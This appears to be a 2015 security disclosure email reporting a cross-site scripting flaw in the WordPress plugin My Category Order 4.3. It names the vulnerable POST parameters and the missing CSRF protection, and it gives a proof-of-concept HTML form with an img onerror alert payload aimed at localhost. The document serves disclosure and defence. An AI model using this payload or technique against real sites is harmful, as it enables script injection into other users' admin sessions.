Subject: Cross-Site Scripting (XSS) in My Category Order 4.3

Date: Thu, 13 Aug 2015 17:06:10 +0200

Hello,

Plugin: My Category Order 4.3 https://wordpress.org/plugins/my-category-order/

1. Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/edit.php?page=mycategoryorder

Vulnerable parameters: cats, hdnParentID

Example PHP callstack:

mycategoryorder [/my-category-order/mycategoryorder.php:121]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/edit.php?page=mycategoryorder">

<input type="text" name="btnSubCats" value="1" />

<input type="text" name="cats" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,